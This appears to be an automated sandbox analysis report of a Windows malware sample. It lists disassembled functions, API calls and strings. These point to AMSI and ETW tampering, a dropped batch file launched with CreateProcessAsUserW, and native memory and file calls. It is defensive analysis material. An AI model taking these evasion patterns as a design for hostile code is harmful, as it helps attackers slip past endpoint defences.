                                                                                                                                                    • API ID: File$AddressFreeHandleModulePathProcProcessString$AllocateAttributesCloseCounterCreateCurrentEnumExitLibraryLoadLocalesMemoryNameName_PerformanceQuerySystemVirtualWrite
                                                                                                                                                    • String ID: Advapi$BCryptVerifySignature$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$bcrypt$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                                                                    • API String ID: 3496465935-2845693168
                                                                                                                                                    • Opcode ID: 3ef9badc991d898c63df0b1ad411a46819e80b93ba120080903716f45bbd5a8f
                                                                                                                                                    • Instruction ID: a53a62a5c624b0a165ce48016118036ee0eac0cf1cb3e9e9506ca5cc0694929c
                                                                                                                                                    • Opcode Fuzzy Hash: 3ef9badc991d898c63df0b1ad411a46819e80b93ba120080903716f45bbd5a8f
                                                                                                                                                    • Instruction Fuzzy Hash: 3343E934A802588BDF10FB65DC809CE73BAEB85700F5095E5E50AEB355DA30AEC6CF65
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DE5A90 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 9313 2de5a90-2de5ad1 GetModuleFileNameA RegOpenKeyExA 9314 2de5b13-2de5b56 call 2de58cc RegQueryValueExA 9313->9314 9315 2de5ad3-2de5aef RegOpenKeyExA 9313->9315 9322 2de5b7a-2de5b94 RegCloseKey 9314->9322 9323 2de5b58-2de5b74 RegQueryValueExA 9314->9323 9315->9314 9316 2de5af1-2de5b0d RegOpenKeyExA 9315->9316 9316->9314 9318 2de5b9c-2de5bcd lstrcpynA GetThreadLocale GetLocaleInfoA 9316->9318 9320 2de5cb6-2de5cbd 9318->9320 9321 2de5bd3-2de5bd7 9318->9321 9325 2de5bd9-2de5bdd 9321->9325 9326 2de5be3-2de5bf9 lstrlenA 9321->9326 9323->9322 9327 2de5b76 9323->9327 9325->9320 9325->9326 9328 2de5bfc-2de5bff 9326->9328 9327->9322 9329 2de5c0b-2de5c13 9328->9329 9330 2de5c01-2de5c09 9328->9330 9329->9320 9332 2de5c19-2de5c1e 9329->9332 9330->9329 9331 2de5bfb 9330->9331 9331->9328 9333 2de5c48-2de5c4a 9332->9333 9334 2de5c20-2de5c46 lstrcpynA LoadLibraryExA 9332->9334 9333->9320 9335 2de5c4c-2de5c50 9333->9335 9334->9333 9335->9320 9336 2de5c52-2de5c82 lstrcpynA LoadLibraryExA 9335->9336 9336->9320 9337 2de5c84-2de5cb4 lstrcpynA LoadLibraryExA 9336->9337 9337->9320
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02DE0000,02E0B790), ref: 02DE5AAC
                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02DE0000,02E0B790), ref: 02DE5ACA
                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02DE0000,02E0B790), ref: 02DE5AE8
                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02DE5B06
                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02DE5B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02DE5B4F
                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,02DE5CFC,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02DE5B95,?,80000001), ref: 02DE5B6D
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,02DE5B9C,00000000,?,?,00000000,02DE5B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02DE5B8F
                                                                                                                                                    • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02DE5BAC
                                                                                                                                                    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02DE5BB9
                                                                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02DE5BBF
                                                                                                                                                    • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02DE5BEA
                                                                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02DE5C31
                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02DE5C41
                                                                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02DE5C69
                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02DE5C79
                                                                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02DE5C9F
                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02DE5CAF
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                    • API String ID: 1759228003-2375825460
                                                                                                                                                    • Opcode ID: ec5d89d4912812189356c790528620c4806d11a0e475ed81ff2239e964fb9192
                                                                                                                                                    • Instruction ID: ad5d80da37db66032d3cdc3c23ff950e736bd032dd766c40bbbc896b53a209d7
                                                                                                                                                    • Opcode Fuzzy Hash: ec5d89d4912812189356c790528620c4806d11a0e475ed81ff2239e964fb9192
                                                                                                                                                    • Instruction Fuzzy Hash: 38514271B4020D7AFF21E6A4DC46FEE77ADDB04788F8041A1A606E6281E674DE84CF64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DFCA6C Relevance: 17.9, APIs: 4, Strings: 6, Instructions: 400processsynchronizationCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 11146 2dfca6c-2dfca70 11147 2dfca75-2dfca7a 11146->11147 11147->11147 11148 2dfca7c-2dfcf2f call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4704 * 2 call 2de4824 call 2de473c call 2de3098 call 2de4698 * 2 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4704 call 2de7ee8 call 2de4964 call 2de4d38 call 2de4db4 call 2de4704 call 2de4964 call 2de4d38 call 2de4db4 CreateProcessAsUserW call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 11147->11148 11309 2dfd03a-2dfd087 call 2de44c4 call 2de4c24 call 2de44c4 call 2de4c24 call 2de44c4 11148->11309 11310 2dfcf35-2dfd035 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 WaitForSingleObject CloseHandle * 2 11148->11310 11310->11309
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 02DF7BE8: LoadLibraryW.KERNEL32(?,00000000,02DF7C9A), ref: 02DF7C18
                                                                                                                                                      • Part of subcall function 02DF7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,02DF7C9A), ref: 02DF7C1E
                                                                                                                                                      • Part of subcall function 02DF7BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 02DF7C37
                                                                                                                                                    • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,02E45644,02E45688,ScanString,02E45344,02DFD0A4,OpenSession,02E45344), ref: 02DFCDD3
                                                                                                                                                    • WaitForSingleObject.KERNEL32(0000088C,000000FF,ScanString,02E45344,02DFD0A4,OpenSession,02E45344,02DFD0A4,ScanString,02E45344,02DFD0A4,OpenSession,02E45344,02DFD0A4,UacScan,02E45344), ref: 02DFD01F
                                                                                                                                                    • CloseHandle.KERNEL32(0000088C,0000088C,000000FF,ScanString,02E45344,02DFD0A4,OpenSession,02E45344,02DFD0A4,ScanString,02E45344,02DFD0A4,OpenSession,02E45344,02DFD0A4,UacScan), ref: 02DFD02A
                                                                                                                                                    • CloseHandle.KERNEL32(00000570,0000088C,0000088C,000000FF,ScanString,02E45344,02DFD0A4,OpenSession,02E45344,02DFD0A4,ScanString,02E45344,02DFD0A4,OpenSession,02E45344,02DFD0A4), ref: 02DFD035
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Handle$Close$AddressCreateLibraryLoadModuleObjectProcProcessSingleUserWait
                                                                                                                                                    • String ID: *"C:\Users\Public\Libraries\CmzcxhwnO.bat" $Amsi$AmsiOpenSession$OpenSession$ScanString$UacScan
                                                                                                                                                    • API String ID: 1205125484-3218151172
                                                                                                                                                    • Opcode ID: c1375414d8ecac194610ae1daf1d22dfd01eeb8bd5eaf14792647475bab56f7e
                                                                                                                                                    • Instruction ID: 26412745242cf0ec6bf33a736fe851e3c5f8e14177579cc235354a3233a21d89
                                                                                                                                                    • Opcode Fuzzy Hash: c1375414d8ecac194610ae1daf1d22dfd01eeb8bd5eaf14792647475bab56f7e
                                                                                                                                                    • Instruction Fuzzy Hash: 17F1FD34A001589FDF50FBA4D881FDEB3B7EF45700F6180A5A20ABB754DA70AD468F65
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DF7966 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24librarymemorynativeCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02DF7975
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02DF797B
                                                                                                                                                    • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DF799B
                                                                                                                                                    Strings
                                                                                                                                                    • NtAllocateVirtualMemory, xrefs: 02DF796B
                                                                                                                                                    • C:\Windows\System32\ntdll.dll, xrefs: 02DF7970
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                                                                    • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                                                                                                                                                    • API String ID: 421316089-2206134580
                                                                                                                                                    • Opcode ID: 33e070c9a4162fb7a22df2c6bae969cb3d52cd90258176d73fe70390266604f5
                                                                                                                                                    • Instruction ID: a6a435167c4529aa7e5d3a201c43e37f095abaa5d9c89159dbbccfad2d89a49f
                                                                                                                                                    • Opcode Fuzzy Hash: 33e070c9a4162fb7a22df2c6bae969cb3d52cd90258176d73fe70390266604f5
                                                                                                                                                    • Instruction Fuzzy Hash: 20E01AB669020CBFEB40EEA8EC41EDA77ECEB18610F404415BA09D7200D770ED608BB9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DF7968 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23librarymemorynativeCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02DF7975
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02DF797B
                                                                                                                                                    • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DF799B
                                                                                                                                                    Strings
                                                                                                                                                    • NtAllocateVirtualMemory, xrefs: 02DF796B
                                                                                                                                                    • C:\Windows\System32\ntdll.dll, xrefs: 02DF7970
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                                                                    • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                                                                                                                                                    • API String ID: 421316089-2206134580
                                                                                                                                                    • Opcode ID: 1353de4a7838454451c653b723df8559b83b5071f23f6410f6fac6f5dfea5503
                                                                                                                                                    • Instruction ID: 69c0d2a02a2bcfef1f18fb37a7382509118e0f3ad02288280c7fceb6948885a8
                                                                                                                                                    • Opcode Fuzzy Hash: 1353de4a7838454451c653b723df8559b83b5071f23f6410f6fac6f5dfea5503
                                                                                                                                                    • Instruction Fuzzy Hash: 80E01AB659020CBFEB40EEA8E841ECA77ECEB18610F404405BA09D7200D770E9608BB9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DFC4DC Relevance: 7.6, APIs: 5, Instructions: 80nativefileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 02DE4EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 02DE4EF2
                                                                                                                                                    • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02DFC5AC), ref: 02DFC517
                                                                                                                                                    • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02DFC5AC), ref: 02DFC547
                                                                                                                                                    • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02DFC55C
                                                                                                                                                    • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02DFC588
                                                                                                                                                    • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02DFC591
                                                                                                                                                      • Part of subcall function 02DE4C24: SysFreeString.OLEAUT32(02DFD42C), ref: 02DE4C32
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1897104825-0
                                                                                                                                                    • Opcode ID: 01db9d51aeb5f1a5b6a6b4a0b73b57ffe9c9c5f4989692c2180b219ecd477bbc
                                                                                                                                                    • Instruction ID: 6f3e2ab44755813ecc43d16828ce5ca2d2a0a6f284a6ad6f1bf7f31a0a3c21d0
                                                                                                                                                    • Opcode Fuzzy Hash: 01db9d51aeb5f1a5b6a6b4a0b73b57ffe9c9c5f4989692c2180b219ecd477bbc
                                                                                                                                                    • Instruction Fuzzy Hash: A721C271A50308BAEB51EA94CC42FDEB7BDEB08700F510466B705F72C0DAB4AE458B68
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DFC8AC Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02DFC9EA
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CheckConnectionInternet
                                                                                                                                                    • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                                    • API String ID: 3847983778-3852638603
                                                                                                                                                    • Opcode ID: 7f497d1bb4a7aef04b466b3d24b9a8fa38e74d2c6fc26fc8207e6d2e5c4d1949
                                                                                                                                                    • Instruction ID: 2b5ecff32ba21c3e3bef03325860f23e371bc9f5bfb108f42a56ff88d8d99aa7
                                                                                                                                                    • Opcode Fuzzy Hash: 7f497d1bb4a7aef04b466b3d24b9a8fa38e74d2c6fc26fc8207e6d2e5c4d1949
                                                                                                                                                    • Instruction Fuzzy Hash: A9412B31A602489BEF10FBA4D881ADEB3FAEF48714F614466E602B7340DA70AD158F64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DFC3F6 Relevance: 6.1, APIs: 4, Instructions: 81nativefileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 02DE4EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 02DE4EF2
                                                                                                                                                    • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02DFC4CA), ref: 02DFC437
                                                                                                                                                    • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02DFC471
                                                                                                                                                    • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02DFC49E
                                                                                                                                                    • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02DFC4A7
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3764614163-0
                                                                                                                                                    • Opcode ID: 88a711c6774b85ba615d8b89274cb2d9368c5392f99ca1e623ba70ecd3612598
                                                                                                                                                    • Instruction ID: cd1037dcac29e7dd366e68bba2107bb3afe5b4bdf97be08c337fd08cc0b7d174
                                                                                                                                                    • Opcode Fuzzy Hash: 88a711c6774b85ba615d8b89274cb2d9368c5392f99ca1e623ba70ecd3612598
                                                                                                                                                    • Instruction Fuzzy Hash: 8D21C571A5020CBAEB51EB94DC42FDEB7BDEB04B10F514465B605F72D0D7B46E048A68
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DFC3F8 Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 02DE4EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 02DE4EF2
                                                                                                                                                    • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02DFC4CA), ref: 02DFC437
                                                                                                                                                    • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02DFC471
                                                                                                                                                    • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02DFC49E
                                                                                                                                                    • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02DFC4A7
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3764614163-0
                                                                                                                                                    • Opcode ID: a118cd6ca217190bc208db3de8adb759064fcf3c4de05e35e3c300d2ec75a7b6
                                                                                                                                                    • Instruction ID: 969e5df88cfde56012f7b75de814ed85f383d7a4f58c88aecd18d30c52ba7782
                                                                                                                                                    • Opcode Fuzzy Hash: a118cd6ca217190bc208db3de8adb759064fcf3c4de05e35e3c300d2ec75a7b6
                                                                                                                                                    • Instruction Fuzzy Hash: C021C071A5020CBAEB51EBA4DC42FDEB7BDEB04B10F614466B605F72D0D7B46E048A68
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DFC368 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 02DE4EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 02DE4EF2
                                                                                                                                                    • RtlInitUnicodeString.N(?,?,00000000,02DFC3E2), ref: 02DFC390
                                                                                                                                                    • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02DFC3E2), ref: 02DFC3A6
                                                                                                                                                    • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02DFC3E2), ref: 02DFC3C5
                                                                                                                                                      • Part of subcall function 02DE4C24: SysFreeString.OLEAUT32(02DFD42C), ref: 02DE4C32
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1694942484-0
                                                                                                                                                    • Opcode ID: 2712c4415e38be0679b27d668322fe046b9821f6791b61a094527cd8398987ed
                                                                                                                                                    • Instruction ID: 1e960bbc47e62bdafdbeda6f559eff7d7420915d43f0567e16587cb833cd9631
